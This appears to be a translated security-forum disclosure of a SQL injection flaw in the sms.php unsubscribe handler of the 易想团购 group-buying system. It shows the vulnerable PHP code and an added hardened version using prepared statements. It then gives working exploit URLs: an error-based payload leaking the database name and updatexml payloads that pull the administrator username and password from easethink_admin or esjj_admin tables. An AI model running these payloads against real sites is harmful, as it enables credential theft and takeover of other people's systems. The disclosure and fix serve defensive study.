First published at: http://club.freebuf.com/?/question/416

by 0x53sec http://www.freebuf.com/author/0x53sec

Several variables in the sms.php file of the 易想团购 group-buying system are not filtered strictly enough, resulting in a SQL injection vulnerability. Part of the code:

 

elseif($_REQUEST['act']=='do_unsubscribe_verify')
{
    $code = trim($_REQUEST['code']);
    $mobile = trim($_REQUEST['mobile']);
    $mobile_item = $GLOBALS['db']->getRow("select * from ".DB_PREFIX."mobile_list where mobile = '".$mobile."' and verify_code = '".$code."'");  // $mobile and $code here have only had surrounding whitespace trimmed, which is what allows the SQL injection.
    if($mobile_item)
    {
        $GLOBALS['db']->query("delete from ".DB_PREFIX."mobile_list where id = ".$mobile_item['id']);
        $result['type'] = 1;
        ajax_return($result);
    }
    else
    {
        $result['type'] = 0;
        $result['message'] = $GLOBALS['lang']['VERIFY_CODE_ERROR'];
        ajax_return($result);
    }
}
?>
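For contrast, a hardened version of the same branch, added here as an illustration and not taken from the 易想团购 source. It assumes a PDO connection, a $lang array for the error message, and that a valid mobile number is 11 digits and a valid verify code is 4 to 8 alphanumeric characters (both formats are assumptions, not documented by the page):

```php
<?php
// Added example, not the project's own code. Hardened form of the
// do_unsubscribe_verify branch: input is validated against a strict
// whitelist and the query is parameterised, so user input is never
// concatenated into SQL text. $prefix stands in for DB_PREFIX and is a
// trusted configuration constant, never request data.
function handle_unsubscribe_verify(PDO $pdo, array $request, string $prefix, array $lang): array
{
    $code   = trim((string)($request['code'] ?? ''));
    $mobile = trim((string)($request['mobile'] ?? ''));

    // Reject anything that does not look like a mobile number or a verify
    // code before it reaches the database (formats are assumed here).
    if (!preg_match('/^\d{11}$/', $mobile) || !preg_match('/^[A-Za-z0-9]{4,8}$/', $code)) {
        return ['type' => 0, 'message' => $lang['VERIFY_CODE_ERROR']];
    }

    // Prepared statement: the values are bound, so a quote or comment
    // sequence in $code or $mobile is just data, not SQL.
    $stmt = $pdo->prepare(
        "SELECT id FROM {$prefix}mobile_list WHERE mobile = :mobile AND verify_code = :code"
    );
    $stmt->execute([':mobile' => $mobile, ':code' => $code]);
    $item = $stmt->fetch(PDO::FETCH_ASSOC);

    if (!$item) {
        return ['type' => 0, 'message' => $lang['VERIFY_CODE_ERROR']];
    }

    // The delete also binds its parameter rather than interpolating the id.
    $del = $pdo->prepare("DELETE FROM {$prefix}mobile_list WHERE id = :id");
    $del->execute([':id' => (int)$item['id']]);

    return ['type' => 1];
}
```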

Exp:

/sms.php?act=do_unsubscribe_verify&code='%20and (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a)%23


 

Retrieving the administrator account and password:

/sms.php?act=do_unsubscribe_verify&code='and (updatexml(1,concat(0x3a,(select concat(adm_name,0x3a,adm_password) from easethink_admin limit 1)),1))%23

 

With the table prefix changed:

/sms.php?act=do_unsubscribe_verify&code='and (updatexml(1,concat(0x3a,(select concat(adm_name,0x3a,adm_password) from esjj_admin limit 1)),1))%23
